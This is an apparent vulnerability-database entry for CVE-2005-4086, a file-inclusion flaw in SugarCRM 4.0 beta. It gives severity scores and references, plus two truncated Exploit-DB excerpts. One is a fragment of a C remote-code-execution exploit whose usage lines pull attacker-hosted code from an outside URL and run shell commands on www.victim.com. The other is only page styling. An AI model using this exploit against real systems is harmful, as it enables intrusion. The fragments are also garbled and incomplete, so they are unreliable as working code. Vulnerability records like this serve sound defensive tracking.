CVE-2005-4086
Published: 2005-12-08

Priority: P433 · Severity: medium · CVSS 2.0 base score: 5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
Public exploit: yes
EPSS: 7.33% (93.6th percentile)
Directory traversal vulnerability in acceptDecline.php in Sugar Suite Open Source Customer Relationship Management (SugarCRM) 4.0 beta and earlier allows remote attackers to include arbitrary local files via ".." sequences in the beanFiles array parameter.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sugarcrm | sugar_suite | — | — |
| sugarcrm | sugar_suite | — | — |
No detection rules found.
Exploit-DB: SugarSuite Open Source 4.0beta - Remote Code Execution (2)
Source: exploitdb · 2005-12-08 · CVE-2005-4086
---
```c
/*
gcc -o sugar sugar.c
Usage ./sugar [host] [/path/] [site] [cmd]
Sugar Suite Open Source ");
fclose($fp);
?>
./sugar www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al
HTTP/1.1 200 OK
Date: Thu, 08 Dec 2005 12:35:33 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) PHP/4.3.10 mod_perl/1.27
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html
Linux victim.com 2.4.9-e.57smp #1 SMP Thu Dec 2 20:51:12 EST 2004 i686 unknown
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define HTTP_PORT 80
#define DATA "\ncompile gcc -o sugar sugar.c\n\nexample ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%%20-a;\n\nPut this in your file.txt\n\n\");\nfclose($fp
```
Exploit-DB: SugarSuite Open Source 4.0beta - Remote Code Execution (1)
Source: exploitdb · 2005-12-07 · CVE-2005-4087
---
Sugar Suite Open Source

```css
body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-s
```
No writeups or analysis indexed.
References

- http://rgod.altervista.org/sugar_suite_40beta.html
- http://secunia.com/advisories/17948
- http://securitytracker.com/id?1015322
- http://www.securityfocus.com/archive/1/418840
- http://www.securityfocus.com/bid/15760
- http://www.vupen.com/english/advisories/2005/2800